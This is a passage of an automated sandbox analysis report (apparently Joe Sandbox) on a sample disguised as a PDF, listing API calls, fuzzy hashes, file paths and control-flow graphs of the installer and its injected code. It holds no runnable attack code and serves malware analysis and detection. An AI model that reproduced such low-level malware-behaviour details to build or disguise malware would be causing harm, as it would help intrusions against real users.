                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                                                                                                                                • String ID: @$C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll
                                                                                                                                                • API String ID: 4079680657-608496885
                                                                                                                                                • Opcode ID: aa7ec03ee00d28e014fa6505370972872b830a8762c26e593078ae465e74a0c3
                                                                                                                                                • Instruction ID: eb73de0908827afac095caf57cdf6eb37e5abf97a1b8575dd1b675aa20df7b67
                                                                                                                                                • Opcode Fuzzy Hash: aa7ec03ee00d28e014fa6505370972872b830a8762c26e593078ae465e74a0c3
                                                                                                                                                • Instruction Fuzzy Hash: E9118C72A083809BC710EFA2C94561ABBE9BF84345F40493EF595A72D1DBB98805CB4A
                                                                                                                                                Function 0040674D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406C2F: lstrcpynW.KERNEL32(?,?,00000400,00403979,00428D40,NSIS Error), ref: 00406C3C
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(?,?,?,00000000,00425A78,00406764,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 00406CE9
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(00000000), ref: 00406CEE
                                                                                                                                                  • Part of subcall function 00406CDA: CharNextW.USER32(00000000), ref: 00406D08
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EC7
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,?,?,00000000), ref: 00406ED6
                                                                                                                                                  • Part of subcall function 00406E52: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EDB
                                                                                                                                                  • Part of subcall function 00406E52: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403DB4,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406EF3
                                                                                                                                                • lstrlenW.KERNEL32(00425A78,00000000,00425A78,00425A78,00000000,?,?,00406850,?,00000000,776A3420,00000000), ref: 004067A1
                                                                                                                                                • GetFileAttributesW.KERNEL32(00425A78,00425A78), ref: 004067B2
                                                                                                                                                  • Part of subcall function 004066E4: FindFirstFileW.KERNELBASE(00000000,00427678,00000000,00406791,00425A78), ref: 004066EF
                                                                                                                                                  • Part of subcall function 004066E4: FindClose.KERNEL32(00000000), ref: 004066FB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                                                                                • String ID: xZB
                                                                                                                                                • API String ID: 1879705256-2099606936
                                                                                                                                                • Opcode ID: 5800bf596dedfe38e5e8e205addafa35088b03d9a536258e662f59f23e937245
                                                                                                                                                • Instruction ID: 2db780cc6ff4cd725acbdd47cdb002ba9ae4a6237b2c335b3197585fa2333bb0
                                                                                                                                                • Opcode Fuzzy Hash: 5800bf596dedfe38e5e8e205addafa35088b03d9a536258e662f59f23e937245
                                                                                                                                                • Instruction Fuzzy Hash: 41F0816111462159D62123754E8852B55588E0576D75B4E3FFCA3F32D3CA3CCD35917C
                                                                                                                                                Function 00406A8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,00424230,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,?,004060BE), ref: 00406AD3
                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00406ADE
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                • String ID: Call
                                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                                • Opcode ID: 06b5c5a8a77114971240aaeb66a1a7ac0d855d789a2ba5ec2246048785c8eebf
                                                                                                                                                • Instruction ID: 34caf82e5ea4c281413b850cd147b84363d63a2aa5d54ac32b4bcbe0ea44b894
                                                                                                                                                • Opcode Fuzzy Hash: 06b5c5a8a77114971240aaeb66a1a7ac0d855d789a2ba5ec2246048785c8eebf
                                                                                                                                                • Instruction Fuzzy Hash: 91014C7651010ABADF218FA4DD0AADF7BF8EF45344F114136B802E2160D274EA64DBA4
                                                                                                                                                Function 004059D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00405A07
                                                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405A4F
                                                                                                                                                  • Part of subcall function 004055EB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004055FD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                • Opcode ID: 8bed61b20fc1319d828832d96cd2df9170cc440e4b5382bb1eccda39d0ccd4f6
                                                                                                                                                • Instruction ID: 3928be96b0bb21ea01fbc6d57ea2e9352dbda775cb9ee4e874704f653b680fb1
                                                                                                                                                • Opcode Fuzzy Hash: 8bed61b20fc1319d828832d96cd2df9170cc440e4b5382bb1eccda39d0ccd4f6
                                                                                                                                                • Instruction Fuzzy Hash: D9018F35700908EBDF309F55EC85A9B3A26EB88765F004237FA04B61D1C7798892DEAD

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:0%
                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                Signature Coverage:34.6%
                                                                                                                                                Total number of Nodes:81
                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                execution_graph 34547 3261b260 29 API calls 34550 3261be60 6 API calls 34634 3261c170 44 API calls 34636 3265d97c 19 API calls 34554 32616e40 RtlDebugPrintTimes 34640 3261a740 44 API calls 34556 32623640 GetPEB GetPEB GetPEB 34557 3264ea40 10 API calls 34558 32629046 10 API calls 34641 3263e547 63 API calls 34559 32630445 75 API calls 34560 3264ee48 13 API calls 34644 32677948 LdrInitializeThunk RtlDebugPrintTimes GetPEB 34561 326ce85d 95 API calls 34646 3262b950 166 API calls 34562 32621051 RtlDebugPrintTimes GetPEB GetPEB GetPEB GetPEB 34567 3262d454 9 API calls 34648 326dab50 16 API calls 34569 3261b620 GetPEB RtlDebugPrintTimes GetPEB 34570 3261b420 10 API calls 34651 32651527 11 API calls 34572 326df82b 18 API calls 34652 326de925 20 API calls 34653 3263252b 15 API calls 34575 32661e2f 20 API calls 34655 326ad724 GetPEB GetPEB GetPEB RtlDebugPrintTimes 34576 32617a30 11 API calls 34577 3263f230 12 API calls 34658 32641332 55 API calls 34659 3261c301 10 API calls 34660 32622500 32 API calls 34583 3261e202 8 API calls 34585 326b3608 195 API calls 34586 3264d600 226 API calls 34661 32650100 150 API calls 34664 3262890a GetPEB GetPEB RtlDebugPrintTimes 34666 3264510f 15 API calls 34588 3261640d 50 API calls 34589 32619610 7 API calls 34667 3261a710 GetPEB GetPEB GetPEB GetPEB 34590 32622410 22 API calls 34668 32628b10 160 API calls 34669 3264c310 7 API calls 34671 326cf51b 17 API calls 34592 3261821b 8 API calls 34593 326172e0 GetPEB GetPEB GetPEB GetPEB GetPEB 34594 326258e0 342 API calls 34673 326499e0 147 API calls 34676 326291e5 168 API calls 34680 326173f0 GetPEB GetPEB 34681 32617bf0 7 API calls 34682 326301f1 151 API calls 34604 326e70f1 RtlDebugPrintTimes RtlDebugPrintTimes RtlDebugPrintTimes 34605 3261b0c0 31 API calls 34686 3261e3c0 11 API calls 34688 326181c0 GetPEB 34690 326351c0 9 API calls 34606 326e04c7 LdrInitializeThunk GetPEB GetPEB 34607 326d06c6 88 API calls 34693 3261c1d0 6 API calls 34694 32623bd0 7 API calls 34608 3264f4d0 14 API calls 34611 326200a0 156 API calls 34612 326206a0 12 API calls 34613 326600a5 47 API calls 34703 3261e9ac 53 API calls 34704 326e8bbe 161 API calls 34615 326182b0 6 API calls 34616 326242b0 GetPEB GetPEB RtlDebugPrintTimes GetPEB GetPEB 34706 326245b0 51 API calls 34707 3261a980 GetPEB LdrInitializeThunk 34620 326dba80 148 API calls 34622 3265b28a LdrInitializeThunk 34623 3261a290 160 API calls 34624 3261c090 12 API calls 34711 32652594 12 API calls 34626 3263d690 6 API calls 34713 32649990 148 API calls 34628 32646691 27 API calls 34546 32662b90 LdrInitializeThunk 34715 326c8b90 35 API calls

                                                                                                                                                Executed Functions

                                                                                                                                                Function 32662B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 0 32662b90-32662b9c LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: 2ca71c64759a3d9ef8eaf4392cb9f6a57c4b027f31d191a8a78bab46da058d1b
                                                                                                                                                • Instruction ID: b9789a393ad08db91b67915544ffe869e31aa902448973aa290100b972537bab
                                                                                                                                                • Opcode Fuzzy Hash: 2ca71c64759a3d9ef8eaf4392cb9f6a57c4b027f31d191a8a78bab46da058d1b
                                                                                                                                                • Instruction Fuzzy Hash: 3D90023120118802D610655CA70475A10054FD0301F55D816A4524618DD6A58CD57121
                                                                                                                                                Function 326634E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 2 326634e0-326634ec LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: 42f739ad3bda182d86ec940ffd7a966d73d86159c14b0058d8a76d36411e8d4e
                                                                                                                                                • Instruction ID: 23699477870e226f3634b27660a2c53ec2164c8509f947cbd1cee7a9225704a9
                                                                                                                                                • Opcode Fuzzy Hash: 42f739ad3bda182d86ec940ffd7a966d73d86159c14b0058d8a76d36411e8d4e
                                                                                                                                                • Instruction Fuzzy Hash: 1090023160520402D600655C671471620054FD0201F61D816A0524528DD7A58D9575A2
                                                                                                                                                Function 32662D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1 32662d10-32662d1c LdrInitializeThunk
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                • Opcode ID: b866397ef8a9d5f1da5ad226d7825367ed8284a84471ae8b0ed2fc9bad0f1f1f
                                                                                                                                                • Instruction ID: 011e5e76266100c3243b8b4494496d718243716ef31ad560027d6a590ac7cd52
                                                                                                                                                • Opcode Fuzzy Hash: b866397ef8a9d5f1da5ad226d7825367ed8284a84471ae8b0ed2fc9bad0f1f1f
                                                                                                                                                • Instruction Fuzzy Hash: 9390023120110413D611655C670471710094FD0241F91D817A0524518DE6668D96B121

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 326C9060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 180 326c9060-326c90a9 181 326c90f8-326c9107 180->181 182 326c90ab-326c90b0 180->182 183 326c9109-326c910e 181->183 184 326c90b4-326c90ba 181->184 182->184 185 326c9893-326c98a7 call 32664b50 183->185 186 326c9215-326c923d call 32668f40 184->186 187 326c90c0-326c90e4 call 32668f40 184->187 196 326c925c-326c9292 186->196 197 326c923f-326c925a call 326c98aa 186->197 194 326c90e6-326c90f3 call 326e92ab 187->194 195 326c9113-326c91b4 GetPEB call 326cd7e5 187->195 206 326c91fd-326c9210 RtlDebugPrintTimes 194->206 207 326c91b6-326c91c4 195->207 208 326c91d2-326c91e7 195->208 201 326c9294-326c9296 196->201 197->201 201->185 205 326c929c-326c92b1 RtlDebugPrintTimes 201->205 205->185 215 326c92b7-326c92be 205->215 206->185 207->208 209 326c91c6-326c91cb 207->209 208->206 210 326c91e9-326c91ee 208->210 209->208 213 326c91f0 210->213 214 326c91f3-326c91f6 210->214 213->214 214->206 215->185 216 326c92c4-326c92df 215->216 217 326c92e3-326c92f4 call 326ca388 216->217 220 326c92fa-326c92fc 217->220 221 326c9891 217->221 220->185 222 326c9302-326c9309 220->222 221->185 223 326c947c-326c9482 222->223 224 326c930f-326c9314 222->224 227 326c961c-326c9622 223->227 228 326c9488-326c94b7 call 32668f40 223->228 225 326c933c 224->225 226 326c9316-326c931c 224->226 232 326c9340-326c9391 call 32668f40 RtlDebugPrintTimes 225->232 226->225 231 326c931e-326c9332 226->231 229 326c9674-326c9679 227->229 230 326c9624-326c962d 227->230 241 326c94b9-326c94c4 228->241 242 326c94f0-326c9505 228->242 236 326c967f-326c9687 229->236 237 326c9728-326c9731 229->237 230->217 235 326c9633-326c966f call 32668f40 230->235 238 326c9338-326c933a 231->238 239 326c9334-326c9336 231->239 232->185 274 326c9397-326c939b 232->274 259 326c9869 235->259 245 326c9689-326c968d 236->245 246 326c9693-326c96bd call 326c8093 236->246 237->217 243 326c9737-326c973a 237->243 238->232 239->232 248 326c94cf-326c94ee 241->248 249 326c94c6-326c94cd 241->249 253 326c9507-326c9509 242->253 254 326c9511-326c9518 242->254 250 326c97fd-326c9834 call 32668f40 243->250 251 326c9740-326c978a 243->251 245->237 245->246 271 326c9888-326c988c 246->271 272 326c96c3-326c971e call 32668f40 RtlDebugPrintTimes 246->272 258 326c9559-326c9576 RtlDebugPrintTimes 248->258 249->248 284 326c983b-326c9842 250->284 285 326c9836 250->285 256 326c978c 251->256 257 326c9791-326c979e 251->257 260 326c950f 253->260 261 326c950b-326c950d 253->261 262 326c953d-326c953f 254->262 256->257 268 326c97aa-326c97ad 257->268 269 326c97a0-326c97a3 257->269 258->185 289 326c957c-326c959f call 32668f40 258->289 270 326c986d 259->270 260->254 261->254 266 326c951a-326c9524 262->266 267 326c9541-326c9557 262->267 281 326c952d 266->281 282 326c9526 266->282 267->258 279 326c97af-326c97b2 268->279 280 326c97b9-326c97fb 268->280 269->268 278 326c9871-326c9886 RtlDebugPrintTimes 270->278 271->217 272->185 313 326c9724 272->313 275 326c939d-326c93a5 274->275 276 326c93eb-326c9400 274->276 286 326c93a7-326c93d0 call 326c8093 275->286 287 326c93d2-326c93e9 275->287 288 326c9406-326c9414 276->288 278->185 278->271 279->280 280->278 292 326c952f-326c9531 281->292 282->267 290 326c9528-326c952b 282->290 293 326c984d 284->293 294 326c9844-326c984b 284->294 285->284 297 326c9418-326c946f call 32668f40 RtlDebugPrintTimes 286->297 287->288 288->297 311 326c95bd-326c95d8 289->311 312 326c95a1-326c95bb 289->312 290->292 300 326c953b 292->300 301 326c9533-326c9535 292->301 295 326c9851-326c9857 293->295 294->295 302 326c985e-326c9864 295->302 303 326c9859-326c985c 295->303 297->185 316 326c9475-326c9477 297->316 300->262 301->300 308 326c9537-326c9539 301->308 302->270 309 326c9866 302->309 303->259 308->262 309->259 314 326c95dd-326c960b RtlDebugPrintTimes 311->314 312->314 313->237 314->185 318 326c9611-326c9617 314->318 316->271 318->243
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                                • String ID: $ $0
                                                                                                                                                • API String ID: 3446177414-3352262554
                                                                                                                                                • Opcode ID: 78b49f9190812c6759547c988ea89e5065f4c5281dd646603b331d7cfc8bd3d5
                                                                                                                                                • Instruction ID: 98b14c1700befd132894c8ae6b3a0a904e37744fbb9be4b3e42d9a85caa7a3b2
                                                                                                                                                • Opcode Fuzzy Hash: 78b49f9190812c6759547c988ea89e5065f4c5281dd646603b331d7cfc8bd3d5
                                                                                                                                                • Instruction Fuzzy Hash: 913225B16093818FE314DF68C484BABBBE5FF88348F44492EF59987250DB74E949CB52
                                                                                                                                                Function 3261D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 785 3261d2ec-3261d32d 786 3261d333-3261d335 785->786 787 3267a69c 785->787 786->787 788 3261d33b-3261d33e 786->788 790 3267a6a6-3267a6bf call 326dbd08 787->790 788->787 789 3261d344-3261d34c 788->789 791 3261d356-3261d3a1 call 32665050 call 32662ab0 789->791 792 3261d34e-3261d350 789->792 798 3267a6c5-3267a6c8 790->798 799 3261d56a-3261d56d 790->799 808 3261d3a7-3261d3b0 791->808 809 3267a600-3267a61a call 32617220 791->809 792->791 794 3267a5f6-3267a5fb 792->794 797 3261d5c0-3261d5c8 794->797 802 3261d54d-3261d54f 798->802 801 3261d56f-3261d575 799->801 805 3261d63b-3261d63d 801->805 806 3261d57b-3261d588 GetPEB call 32633bc0 801->806 802->799 804 3261d551-3261d564 call 32643262 802->804 804->799 825 3267a6cd-3267a6d2 804->825 810 3261d58d-3261d592 805->810 806->810 813 3261d3b2-3261d3b4 808->813 814 3261d3ba-3261d3cd call 3261d736 808->814 829 3267a624-3267a628 809->829 830 3267a61c-3267a61e 809->830 817 3261d5a1-3261d5a6 810->817 818 3261d594-3261d59d call 32662a80 810->818 813->814 820 3267a630-3267a63b call 326dad61 813->820 833 3261d3d3-3261d3d7 814->833 834 3267a658 814->834 822 3261d5b5-3261d5ba 817->822 823 3261d5a8-3261d5b1 call 32662a80 817->823 818->817 820->814 843 3267a641-3267a653 820->843 822->797 831 3267a6d7-3267a6db call 32662a80 822->831 823->822 825->799 829->820 830->829 836 3261d52e 830->836 839 3267a6e0 831->839 841 3261d5cb-3261d623 call 32665050 call 32662ab0 833->841 842 3261d3dd-3261d3f7 call 3261d8d0 833->842 848 3267a660-3267a662 834->848 840 3261d530-3261d535 836->840 839->839 844 3261d537-3261d539 840->844 845 3261d549 840->845 859 3261d642-3261d645 841->859 860 3261d625 841->860 842->848 853 3261d3fd-3261d44e call 32665050 call 32662ab0 842->853 843->814 844->790 850 3261d53f-3261d543 844->850 845->802 848->799 849 3267a668 848->849 855 3267a66d 849->855 850->790 850->845 853->834 865 3261d454-3261d45d 853->865 861 3267a677-3267a67c 855->861 859->836 864 3261d62f-3261d636 860->864 861->805 864->840 865->855 866 3261d463-3261d492 call 32665050 call 3261d64a 865->866 866->864 871 3261d498-3261d49e 866->871 871->864 872 3261d4a4-3261d4aa 871->872 872->805 873 3261d4b0-3261d4cc GetPEB call 32635d90 872->873 873->861 876 3261d4d2-3261d4ef call 3261d64a 873->876 879 3261d4f1-3261d4f6 876->879 880 3261d526-3261d52c 876->880 881 3267a681-3267a686 879->881 882 3261d4fc-3261d524 call 32644ca6 879->882 880->801 880->836 881->882 883 3267a68c-3267a697 881->883 882->880 883->840
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.38153091093.00000000325F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 325F0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.38153091093.0000000032719000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.38153091093.000000003271D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_325f0000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.d2
                                                                                                                                                • API String ID: 0-2549624499
                                                                                                                                                • Opcode ID: 6f2b9b7e1eed164046ef7ab9692115abfb29a23a818ba2be435110171a47f6ba
                                                                                                                                                • Instruction ID: bbe61182e396b72ef63dc164967950d64cf0653d21c566267873c8fa9e8eefdd
                                                                                                                                                • Opcode Fuzzy Hash: 6f2b9b7e1eed164046ef7ab9692115abfb29a23a818ba2be435110171a47f6ba
                                                                                                                                                • Instruction Fuzzy Hash: 3EB18AB69083519FD715CF28D880B5FB7E8AF88748F41492EF98897241DB71E908CB97
                                                                                                                                                Function 3261640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
